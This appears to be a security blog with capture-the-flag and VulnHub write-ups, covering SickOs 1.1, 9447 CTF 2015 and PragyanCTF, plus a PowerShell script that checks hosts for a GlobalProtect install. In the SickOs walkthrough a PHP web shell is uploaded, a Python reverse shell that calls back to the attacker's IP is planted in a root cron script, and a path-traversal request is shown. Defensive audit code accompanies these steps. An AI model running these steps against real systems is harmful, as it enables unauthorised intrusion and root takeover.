SickOs1.1 Writeup

Here is a quick write-up for SickOs 1.1 from vulnhub.com:
https://www.vulnhub.com/entry/sickos-11,132/
Created by D4rk

Run a quick NMAP scan to see what we have to work with.
nmap -Pn 192.168.18.146

Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-08 06:35 PST
Nmap scan report for 192.168.18.146
Host is up (0.0044s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy

The Squid proxy port looks interesting, so I configure my browser to use it. Once configured, I am able to access the internet through it. Let's try accessing the target's own IP through the proxy.

[Screenshot: the page served through the proxy]

OK, not much to go on here; looking at the page source shows no clues.
Let's run a quick directory scan using dirb and see if anything interesting shows up.

dirb http://192.168.18.146 /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt -p 192.168.18.146:3128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Dec  8 07:12:14 2015
URL_BASE: http://192.168.18.146/
WORDLIST_FILES: /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt
PROXY: 192.168.18.146:3128

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://192.168.18.146/ ----
+ http://192.168.18.146/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.18.146/connect (CODE:200|SIZE:109)
+ http://192.168.18.146/index (CODE:200|SIZE:21)
+ http://192.168.18.146/index.php (CODE:200|SIZE:21)
+ http://192.168.18.146/robots (CODE:200|SIZE:45)
+ http://192.168.18.146/robots.txt (CODE:200|SIZE:45)
+ http://192.168.18.146/server-status (CODE:403|SIZE:295)

-----------------
END_TIME: Tue Dec  8 07:12:17 2015
DOWNLOADED: 4592 - FOUND: 7

Check out robots.txt:

User-agent: *
Disallow: /
Dissalow: /wolfcms

/wolfcms looks interesting; opening it in a browser shows:

[Screenshot: the wolfcms page]

I had never heard of wolfcms. I check exploit-db and see some vulnerabilities, but most seem to require an authenticated user. So let's download the source for wolfcms to see the file structure. From the source I see several directories, such as images. Looking around those, nothing exciting shows up. So we bring up the admin login page, whose path we determined from the source code.

[Screenshot: the admin login page]

Just try the common admin/admin and we are in.

[Screenshot: logged in to the wolfcms admin]

Now let's see if we can upload my preferred PHP shell, b374k, to get CLI access. Let's put it in the images directory.

[Screenshot: uploading the shell to the images directory]

Now let's see if we can access the newly uploaded file.

[Screenshot: the b374k shell in the browser]

We are now in as the www-data user. From b374k I create a reverse shell back to myself to obtain shell access:

/tmp# nc -lvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from [192.168.18.146] port 6666 [tcp/*] accepted (family 2, sport 33912)
b374k shell : connected
/bin/sh: 0: can't access tty; job control turned off
/tmp>ls
b374k_rs
b374k_rs.c
/tmp>whoami
www-data
/tmp>uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
/tmp>

Let's look at the running processes and see if anything stands out.

/var/www>ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   3536  1892 ?        Ss   20:30   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    20:30   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    20:30   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   20:30   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    20:30   0:00 [migration/0]
root         8  0.0  0.0      0     0 ?        S    20:30   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    20:30   0:00 [rcu_sched]
root        10  0.0  0.0      0     0 ?        S    20:30   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S<   20:30   0:00 [khelper]
root        12  0.0  0.0      0     0 ?        S    20:30   0:00 [kdevtmpfs]
root        13  0.0  0.0      0     0 ?        S<   20:30   0:00 [netns]
root        14  0.0  0.0      0     0 ?        S<   20:30   0:00 [writeback]
root        15  0.0  0.0      0     0 ?        S<   20:30   0:00 [kintegrityd]
root        16  0.0  0.0      0     0 ?        S<   20:30   0:00 [bioset]
root        17  0.0  0.0      0     0 ?        S<   20:30   0:00 [kworker/u17:0]
root        18  0.0  0.0      0     0 ?        S<   20:30   0:00 [kblockd]
root        19  0.0  0.0      0     0 ?        S<   20:30   0:00 [ata_sff]
root        20  0.0  0.0      0     0 ?        S    20:30   0:00 [khubd]
root        21  0.0  0.0      0     0 ?        S<   20:30   0:00 [md]
root        22  0.0  0.0      0     0 ?        S<   20:30   0:00 [devfreq_wq]
root        23  0.0  0.0      0     0 ?        S    20:30   0:00 [kworker/0:1]
root        25  0.0  0.0      0     0 ?        S    20:30   0:00 [khungtaskd]
root        26  0.0  0.0      0     0 ?        S    20:30   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        SN   20:30   0:00 [ksmd]
root        28  0.0  0.0      0     0 ?        SN   20:30   0:00 [khugepaged]
root        29  0.0  0.0      0     0 ?        S    20:30   0:00 [fsnotify_mark]
root        30  0.0  0.0      0     0 ?        S    20:30   0:00 [ecryptfs-kthrea]
root        31  0.0  0.0      0     0 ?        S<   20:30   0:00 [crypto]
root        43  0.0  0.0      0     0 ?        S<   20:30   0:00 [kthrotld]
root        45  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_0]
root        46  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_1]
root        49  0.0  0.0      0     0 ?        S<   20:30   0:00 [dm_bufio_cache]
root        69  0.0  0.0      0     0 ?        S<   20:30   0:00 [deferwq]
root        70  0.0  0.0      0     0 ?        S<   20:30   0:00 [charger_manager]
root        71  0.0  0.0      0     0 ?        S    20:30   0:00 [kworker/0:2]
root       213  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_2]
root       214  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_3]
root       215  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_4]
root       217  0.0  0.0      0     0 ?        S<   20:30   0:00 [mpt_poll_0]
root       222  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_5]
root       223  0.0  0.0      0     0 ?        S<   20:30   0:00 [mpt/0]
root       224  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_6]
root       226  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_7]
root       228  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_8]
root       229  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_9]
root       230  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_10]
root       233  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_11]
root       234  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_12]
root       235  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_13]
root       236  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_14]
root       237  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_15]
root       238  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_16]
root       239  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_17]
root       240  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_18]
root       241  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_19]
root       242  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_20]
root       243  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_21]
root       244  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_22]
root       245  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_23]
root       246  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_24]
root       247  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_25]
root       248  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_26]
root       249  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_27]
root       250  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_28]
root       251  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_29]
root       252  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_30]
root       253  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_31]
root       283  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_32]
root       374  0.0  0.0      0     0 ?        S    20:30   0:00 [jbd2/sda1-8]
root       375  0.0  0.0      0     0 ?        S<   20:30   0:00 [ext4-rsv-conver]
root       376  0.0  0.0      0     0 ?        S<   20:30   0:00 [ext4-unrsv-conv]
root       470  0.0  0.0   2832   608 ?        S    20:30   0:00 upstart-udev-bridge --daemon
root       473  0.0  0.1   3100  1332 ?        Ss   20:30   0:00 /sbin/udevd --daemon
102        559  0.0  0.0   3256   888 ?        Ss   20:30   0:00 dbus-daemon --system --fork --activation=upstart
syslog     563  0.0  0.1  30164  1580 ?        Sl   20:30   0:00 rsyslogd -c5
root       574  0.0  0.0      0     0 ?        S<   20:30   0:00 [ttm_swap]
root       641  0.0  0.0   2976   764 ?        S    20:30   0:00 /sbin/udevd --daemon
root       642  0.0  0.0   3096   880 ?        S    20:30   0:00 /sbin/udevd --daemon
root       710  0.0  0.0      0     0 ?        S<   20:30   0:00 [kpsmoused]
root       769  0.0  0.0   2844   348 ?        S    20:30   0:00 upstart-socket-bridge --daemon
root       849  0.0  0.0   2924   404 ?        Ss   20:30   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root       895  0.0  0.2   6680  2408 ?        Ss   20:30   0:00 /usr/sbin/sshd -D
root      1016  0.0  0.0   4628   844 tty4     Ss+  20:30   0:00 /sbin/getty -8 38400 tty4
root      1021  0.0  0.0   4628   844 tty5     Ss+  20:30   0:00 /sbin/getty -8 38400 tty5
root      1028  0.0  0.0   4628   844 tty2     Ss+  20:30   0:00 /sbin/getty -8 38400 tty2
root      1029  0.0  0.0   4628   848 tty3     Ss+  20:30   0:00 /sbin/getty -8 38400 tty3
root      1036  0.0  0.0   4628   856 tty6     Ss+  20:30   0:00 /sbin/getty -8 38400 tty6
proxy     1061  0.0  1.4  40200 15124 ?        Ss   20:30   0:02 /usr/sbin/squid3 -N -YC -f /etc/squid3/squid.conf
root      1062  0.0  0.0   2172   624 ?        Ss   20:30   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root      1063  0.0  0.0   2616   932 ?        Ss   20:30   0:00 cron
daemon    1064  0.0  0.0   2468   352 ?        Ss   20:30   0:00 atd
whoopsie  1084  0.0  0.3  24468  3768 ?        Ssl  20:30   0:00 whoopsie
mysql     1107  0.0  3.3 326184 33976 ?        Ssl  20:30   0:01 /usr/sbin/mysqld
proxy     1125  0.0  0.0   3220   612 ?        Ss   20:30   0:00 (unlinkd)
root      1136  0.0  0.7  37900  7656 ?        Ss   20:30   0:00 /usr/sbin/apache2 -k start
www-data  1172  0.0  0.7  38864  7776 ?        S    20:30   0:00 /usr/sbin/apache2 -k start
www-data  1174  0.0  0.9  39804 10020 ?        S    20:30   0:00 /usr/sbin/apache2 -k start
root      1185  0.0  0.0   4628   848 tty1     Ss+  20:30   0:00 /sbin/getty -8 38400 tty1
www-data  1379  0.0  0.9  40024  9548 ?        S    20:43   0:00 /usr/sbin/apache2 -k start
www-data  1550  0.0  0.8  39768  9052 ?        S    21:36   0:00 /usr/sbin/apache2 -k start
root      1554  0.0  0.0      0     0 ?        S    21:37   0:00 [kworker/u16:1]
www-data  1596  0.0  0.9  40304  9656 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1597  0.0  0.8  40412  8552 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1602  0.0  0.9  40812 10188 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1614  0.0  0.9  41964 10224 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
www-data  1615  0.0  1.0  41312 10532 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
www-data  1616  0.0  0.8  40412  8644 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
root      1666  0.0  0.0      0     0 ?        S    21:55   0:00 [kworker/u16:0]
www-data  1690  0.0  0.0   2232   544 ?        S    22:00   0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data  1691  0.0  0.0   2232   284 ?        S    22:00   0:00 /bin/sh -i
root      1694  0.0  0.0      0     0 ?        S    22:00   0:00 [kworker/u16:2]
www-data  1695  0.0  0.0   2232   540 ?        S    22:00   0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data  1696  0.0  0.0   2232   280 ?        S    22:00   0:00 /bin/sh -i
www-data  1767  0.0  0.0   2232   540 ?        S    22:01   0:00 sh -c ./b374k_rs 13123 2>&1
www-data  1768  0.0  0.0   2000   284 ?        S    22:01   0:00 ./b374k_rs 13123
www-data  1775  0.0  0.0   2232   544 ?        S    22:03   0:00 sh -c export TERM=xterm;PS1='$PWD>';export PS1;/bin/sh -i
www-data  1776  0.0  0.0   2232   560 ?        S    22:03   0:00 /bin/sh -i
www-data  1790  0.0  0.1   2860  1044 ?        R    22:05   0:00 ps -aux

whoopsie looks odd.

Let's take a look at the wolfcms config file:
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

Nice. Looking through the MySQL tables, nothing interesting pops out. Tried the root password via SSH with no luck, so let's look around a bit.

I see a file in /var/www called connect.py:
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

Well, that looks like a clue. Let's look for something that could launch it, like cron.

I found a file under /etc/cron.d called automate that runs connect.py as root every minute:

* * * * * root /usr/bin/python /var/www/connect.py
Let's edit that script to see if we can get a reverse shell as the root user.

Modified connect.py (the script the automate cron entry runs):

#!/usr/bin/python

import socket, subprocess, os

# Connect back to the attacking machine (192.168.18.181:1234), point stdin,
# stdout and stderr at the socket, then hand over an interactive shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.18.181", 1234))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

Now start the nc listener:

nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

Connection from [192.168.18.146] port 1234 [tcp/*] accepted (family 2, sport 34262)
/bin/sh: 0: can't access tty; job control turned off
# # ls
a0216ea4d51874464078c618298b1367.txt
# whoami
root
# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying
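
A defender's counterpart to this step, as an added example that is not part of the original write-up: a small Python audit that parses /etc/cron.d entries and flags root jobs whose command references a file a non-root user could modify, which is exactly the condition that made the automate entry above exploitable. The cron text, the uid 33 (www-data) ownership of connect.py and the other paths and modes are constructed to mirror the entry above; stat_fn is injectable so the check runs against that constructed metadata here and against the real filesystem with os.stat.

```python
import os
import shlex
import stat
from collections import namedtuple


def parse_cron_d(text):
    """Yield (user, command) for each job in /etc/cron.d-style text.
    Comments, blank lines and VAR=value lines are skipped; "@reboot"-style
    specials carry one schedule field, ordinary entries carry five."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        n_sched = 1 if line.startswith("@") else 5
        parts = line.split(None, n_sched + 1)
        if len(parts) != n_sched + 2:
            continue  # env assignment or malformed entry
        yield parts[n_sched], parts[n_sched + 1]


def risky_root_jobs(cron_text, stat_fn=os.stat):
    """Return [(command, path, reason)] for root jobs whose command names a file
    that a non-root user could modify: not root-owned, world-writable, or
    group-writable by a non-root group. stat_fn is injectable so the check can
    run against constructed metadata (as in the demo below) or the real system."""
    findings = []
    for user, command in parse_cron_d(cron_text):
        if user != "root":
            continue
        for token in shlex.split(command):
            if not token.startswith("/"):
                continue
            try:
                st = stat_fn(token)
            except OSError:
                continue  # path does not exist: nothing to evaluate
            if st.st_uid != 0:
                findings.append((command, token, "owned by uid %d, not root" % st.st_uid))
            elif st.st_mode & stat.S_IWOTH:
                findings.append((command, token, "world-writable"))
            elif st.st_gid != 0 and st.st_mode & stat.S_IWGRP:
                findings.append((command, token, "group-writable by gid %d" % st.st_gid))
    return findings


# Constructed stand-ins for os.stat() results (not taken from the box): connect.py is
# given to www-data (uid 33), matching the fact that the write-up could edit it from the
# www-data shell; backup.sh is root-owned but mode 0777.
FakeStat = namedtuple("FakeStat", "st_mode st_uid st_gid")
SAMPLE_STATS = {
    "/usr/bin/python": FakeStat(0o100755, 0, 0),
    "/var/www/connect.py": FakeStat(0o100644, 33, 33),
    "/usr/local/bin/backup.sh": FakeStat(0o100777, 0, 0),
    "/usr/bin/logrotate": FakeStat(0o100755, 0, 0),
}


def fake_stat(path):
    try:
        return SAMPLE_STATS[path]
    except KeyError:
        raise OSError("no such file: " + path)


# Constructed cron.d content modelled on the automate entry above, plus a few extra lines
SAMPLE_CRON = """\
# /etc/cron.d/automate (constructed)
SHELL=/bin/sh
* * * * * root /usr/bin/python /var/www/connect.py
@daily root /usr/local/bin/backup.sh --quiet
0 * * * * root /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * www-data /var/www/connect.py
"""

if __name__ == "__main__":
    for command, path, reason in risky_root_jobs(SAMPLE_CRON, fake_stat):
        print("root job %r: %s is %s" % (command, path, reason))
```

Run against a real host with `risky_root_jobs(open("/etc/cron.d/automate").read())`; the same check applies to /etc/crontab, and the fix on the box side is to make anything a root cron job executes root-owned and writable only by root.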

This was a lot of fun; thanks for creating it, D4rk!

9447 CTF – 2015

Another great CTF again this year. 9447 ran smoothly and I did not notice any challenge issues. The usual challenge categories were there: web, misc, reverse, exploit and stego. All challenges were very good. Here is a short write-up of the two challenges I was able to complete. I look forward to next year's CTF!

imaged (90pts): Our spies found this image. They think something is hidden in it... what could it be?

The image is just a plain rectangular box PNG.

[Image: imaged.png]

Ran it through the normal tools:

pngcheck imaged.png
OK: imaged.png (2997×14595, 4-bit palette, non-interlaced, -0.2%).

Ran it through strings:
strings imaged.png | more
IHDR
9447
0PLTE
H40t
0l(t
{Ste
IDATx

I see 9447, the start of what looks like a flag, so I open it up in a hex editor.

[Screenshot: hex editor view of imaged.png]

I see the 9447 but nothing after it looks like a flag. I looked up the PNG spec; all the required pieces seem to be there and there is nothing extra or optional in the image. Then I just started looking at each chunk header to validate it. Again, none of the optional chunks are there, but there are a number of IDAT entries, and just 8 bytes before the first one I see {Ste. That looks a little like a flag, so I search for the next one and it's g0_r, then the next one edun, and so on until I come up with the flag. SCORE!

flag is 9447{Steg0_redunDaNcy_CHeck}
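
The hex-editor walk above can be automated. As an added example (not the author's tooling, and not code from the CTF), the Python below parses PNG chunks and verifies each chunk's CRC-32; the 4 bytes sitting 8 bytes before an IDAT type field are the previous chunk's CRC, so chunks whose stored CRC does not verify are exactly the slots where the fragments above were found (the flag text reads as a pun on "cyclic redundancy check"). The 1x1 palette PNG at the bottom is constructed for the demo, with the CRC fields of its IHDR, PLTE and first two IDAT chunks overwritten with the fragments seen in the write-up; it is not the real imaged.png.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def build_chunk(ctype, data, crc_override=None):
    """Serialise one PNG chunk: length, type, data, CRC-32 over type+data.
    crc_override lets the constructed sample plant arbitrary bytes in the CRC slot."""
    if crc_override is None:
        crc_override = struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF)
    return struct.pack(">I", len(data)) + ctype + data + crc_override


def walk_chunks(png_bytes):
    """Yield (type, data, stored_crc, crc_ok) for every chunk up to and including IEND."""
    if not png_bytes.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png_bytes):
        length, ctype = struct.unpack(">I4s", png_bytes[pos:pos + 8])
        data = png_bytes[pos + 8:pos + 8 + length]
        stored = png_bytes[pos + 8 + length:pos + 12 + length]
        if len(data) != length or len(stored) != 4:
            raise ValueError("truncated chunk %r at offset %d" % (ctype, pos))
        expected = zlib.crc32(ctype + data) & 0xFFFFFFFF
        crc_ok = struct.unpack(">I", stored)[0] == expected
        yield ctype, data, stored, crc_ok
        pos += 12 + length
        if ctype == b"IEND":
            break


def bad_crc_bytes(png_bytes):
    """Concatenate the stored CRC bytes of every chunk whose CRC does not verify:
    in a normal image this is empty, in the challenge image it spells the flag."""
    return b"".join(stored for _, _, stored, ok in walk_chunks(png_bytes) if not ok)


# Constructed sample: a minimal 1x1, 4-bit palette PNG whose IHDR, PLTE and first two
# IDAT CRCs are overwritten with flag fragments; the last IDAT and IEND are intact.
ihdr = struct.pack(">IIBBBBB", 1, 1, 4, 3, 0, 0, 0)  # width, height, bit depth, colour type 3, ...
plte = b"\x00\x00\x00\xff\xff\xff"
idat = zlib.compress(b"\x00\x00")                   # one scanline: filter byte + one pixel byte
SAMPLE_PNG = (
    PNG_SIGNATURE
    + build_chunk(b"IHDR", ihdr, crc_override=b"9447")
    + build_chunk(b"PLTE", plte, crc_override=b"{Ste")
    + build_chunk(b"IDAT", idat, crc_override=b"g0_r")
    + build_chunk(b"IDAT", idat, crc_override=b"edun")
    + build_chunk(b"IDAT", idat)
    + build_chunk(b"IEND", b"")
)

if __name__ == "__main__":
    for ctype, data, stored, ok in walk_chunks(SAMPLE_PNG):
        print("%s len=%d crc=%s %s" % (ctype.decode(), len(data), stored.hex(), "ok" if ok else "MISMATCH"))
    print("bytes hidden in bad CRC fields:", bad_crc_bytes(SAMPLE_PNG))
```

Pointed at a real file (`bad_crc_bytes(open("imaged.png", "rb").read())`) this reports every chunk that decoders such as pngcheck would flag as corrupt; a viewer that ignores CRCs still renders the image, which is what makes the CRC slot a convenient hiding place.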

———————————————————————–
YWS (130pts): My friend wrote a cool web server. I'm sure he's stored some great doxxxs on the website. Can you take a look and report back any interesting things you find?

The web page is at http://yws-fsiqc922.9447.plumbing

Start the Burp proxy and start clicking through the site; Burp discovered the link to the flag URL.

Doing a:
GET /.. HTTP/1.1
Host: yws-fsiqc922.9447.plumbing
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response:

HTTP/1.1 200 OK
Server: BWS 0.1
Content-Length: 336
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>Directory listing for /..</title>
</head>
<body>
<h2>Directory listing for /..</h2>
<hr>
<ul>
<li><a href="/../9447{D1rect0ries_ARe_h4rd}">9447{D1rect0ries_ARe_h4rd}</a>
<li><a href="/../.">.</a>
<li><a href="/../..">..</a>
<li><a href="/../gws">gws</a>
<li><a href="/../files">files</a>
</ul>
<hr>
</body>
</html>

Funnily, going to /.. in a browser did not display this page; it just sent us back to the main page.

FLAG IS
9447{D1rect0ries_ARe_h4rd}
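
The flaw is a request path that escapes the document root. As an added example, not code from the challenge server (whose source is not shown), here is a Python resolver that contrasts the naive docroot + path concatenation with one that percent-decodes, normalises and prefix-checks the result; the docroot /srv/www and the file names in the demo are assumed. Browsers remove dot segments (so /.. becomes /) before sending a request, which is why the listing only appeared when the raw request went through Burp.

```python
import posixpath
from urllib.parse import unquote


def request_target(request_line):
    """Pull the request-target out of a request line such as 'GET /.. HTTP/1.1'."""
    parts = request_line.split()
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % request_line)
    return parts[1]


def naive_resolve(docroot, request_path):
    """What the challenge server appears to do: glue the request path onto the
    document root with no normalisation, so '/..' names the parent of docroot.
    Kept only to contrast with safe_resolve; never serve files this way."""
    return docroot + request_path


def safe_resolve(docroot, request_path):
    """Map a request path onto the filesystem; return None for anything that
    would land outside docroot. Percent-decodes first (so %2e%2e is seen as
    '..'), drops the query string, rejects NUL bytes, normalises away '.' and
    '..' segments, then requires docroot to be a path prefix of the result."""
    docroot = posixpath.normpath(docroot)
    target = unquote(request_path.split("?", 1)[0])
    if not target.startswith("/") or "\x00" in target:
        return None
    full = posixpath.normpath(posixpath.join(docroot, target.lstrip("/")))
    # The trailing slash matters: without it '/srv/www2' would pass for docroot '/srv/www'
    if full != docroot and not full.startswith(docroot.rstrip("/") + "/"):
        return None
    return full


if __name__ == "__main__":
    # Assumed document root; the first request is the one sent through Burp above
    docroot = "/srv/www"
    for line in ("GET /.. HTTP/1.1", "GET /../files HTTP/1.1",
                 "GET /%2e%2e/ HTTP/1.1", "GET /files/a.txt HTTP/1.1"):
        path = request_target(line)
        print("%-28s naive=%-22s safe=%s" % (line, naive_resolve(docroot, path),
                                             safe_resolve(docroot, path)))
```

The check is done on the decoded, normalised path rather than by rejecting the literal string "..", so encoded and mixed forms are handled the same way; a server should also refuse to follow symlinks out of docroot, which is a filesystem check this string-level example does not cover.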

BSides Boston - Common misconfigurations that lead to a breach, by Justin Tharpe

One of our capture-the-flag team members gave a talk at BSides Boston; check it out.

Palo Alto Networks GlobalProtect check script

I had a customer that wanted to make sure that the GlobalProtect client was installed on every Windows machine on their domain. To fill this need I created a PowerShell script that reads a list of IP subnets from a text file, determines which hosts are up, and then checks those hosts for a GlobalProtect installation by looking for a specific file.

Keep in mind I am not a PowerShell guru (lots of Google searching went into creating this), so I am sure there are many enhancements that could be made, such as multi-threading and the like. At any rate, hopefully someone else can make use of this. Use at your own risk.

#
# 2015-04-06 GP-scan.ps1
# Disclaimer: I am not a PowerShell expert, just hacked this together to meet the need.
# Script created by Brian Hitchcock to scan defined network ranges for live hosts, then check for GlobalProtect install files.
#
# Script will need to be run by a user that has permissions to the end machines' file system to verify the file is in place.
#
# c:\script\networks.txt  File containing the /24 networks to check, in the format 192.168.0 (no trailing ".", no extra spaces), e.g.
# 192.168.0
# 10.10.0
# c:\script\ips.txt       File created from the ping scan of live hosts. File is overwritten on each script run.

function check-remotefile {

    PROCESS {
        # $_ is one IP address from the pipeline; look for the GlobalProtect data file via the admin share
        $file = "\\$_\c$\Program Files\Palo Alto Networks\GlobalProtect\pinfo.dat"
        if (Test-Path $file)
        {
            Write-Host "GP installed " -NoNewline
            echo $_
        }
        else
        {
            Write-Host "!GP not installed " -NoNewline
            echo $_
        }
    }
}

# Create ips.txt file
echo " GP-scan by Brian Hitchcock"
echo "Scanning for hosts"
echo " " | Out-File c:\script\ips.txt

# Loop through networks.txt, ping-scan each /24 and write the live hosts to ips.txt
foreach ($network in Get-Content c:\script\networks.txt) {
    1..254 | ForEach-Object { (New-Object System.Net.NetworkInformation.Ping).Send("$network.$_") } | Where-Object { $_.Status -eq "Success" } | Select Address | Format-Table Address -AutoSize -HideTableHeaders | Out-File c:\script\ips.txt -Append
}

# Remove blank lines from ips.txt
( Get-Content c:\script\ips.txt ) | Where { $_.Trim(" `t") } | Set-Content c:\script\ips.txt

echo "Check live hosts for Global Protect"
# Check each live host for the GlobalProtect file
Get-Content c:\script\ips.txt | check-remotefile

#####################
Sample run
######################

PS C:\script> .\gp-scan.ps1
GP-scan by Brian Hitchcock
Scanning for hosts
Check live hosts for Global Protect
!GP not installed 192.168.18.1
!GP not installed 192.168.18.2
!GP not installed 192.168.18.3
!GP not installed 192.168.18.4
GP installed 192.168.18.5
!GP not installed 192.168.18.10
!GP not installed 192.168.18.130
!GP not installed 192.168.18.251
!GP not installed 192.168.18.252
!GP not installed 10.20.10.7
!GP not installed 10.20.10.8
!GP not installed 10.20.10.9
!GP not installed 10.20.10.12
!GP not installed 10.20.10.13
!GP not installed 10.20.10.14
!GP not installed 10.20.10.16

PragyanCTF

Another nice CTF. This one was pretty laid back and went on for over a week. It seemed to have a lot of stego and crypto challenges and was pretty light on any type of reverse or forensics. Everything seems to have gone smoothly; I didn't notice any issues. Some members of OverflowSecurity were in and out of the challenges. Here are the write-ups for the ones that I completed.

STEGO

Put on your reading glasses (10 pts)
Run strings on the file; the flag is at the bottom:

strings Proxy.jpg

M}EU]sF
1Z5;”A
kjiFF
16bbee7466db38dad50701223d57ace8

What you see is what you get. (50 pts)

Running strings, the bottom of the output shows us the program used (steghide) and the key to extract with:

#strings stego_50.jpg
:W9K
QIK@
RP!h
usethisUT
steghide.sourceforge.net/download.phpPK
usethisUT
Delta_Force\m/

steghide --extract -sf stego_50.jpg
Enter passphrase:
wrote extracted data to “key_stego_1”.
root@kali:~/CTF/pragyan/stego/what-you-see-is-what-you-get# ls
key_stego_1 stegcrack.pl stego_50.jpg
root@kali:~/CTF/pragyan/stego/what-you-see-is-what-you-get# cat key_stego_1
Congrats! This was way too wasy 😛

This is the key:

PrAgyaNCTF_sTeg1_key

CRYPTO

One more headache (20 pts)

The challenge text says "This is a PRGYAN event", and a text file called substitution is given with the following content:
dhkuagsn
Assuming that PRGYAN is the key,

I used an online keyword cipher decoder:
http://www.braingle.com/brainteasers/codes/keyword.php

Entered key: prgyanpr, cipher text: dhkuagsn

Solution: ilovectf

FORENSICS
Access Code (30pts)
Find the access code

A PDF is shown:

[Screenshot: the PDF]

Rip the JPEG out of the PDF (you can right-click and save it).

This is the JPEG:

[Image: out-000]

Did a Google image search by dragging and dropping the image into the search box, and found that the artist's name is Sascha Herm.

The PDF said KEYED painter, so go to the online keyword cipher decoder:
http://www.braingle.com/brainteasers/codes/keyword.php

Use KEY: saschahermsasch
with Cipher Text: heitsctrnpsmysk
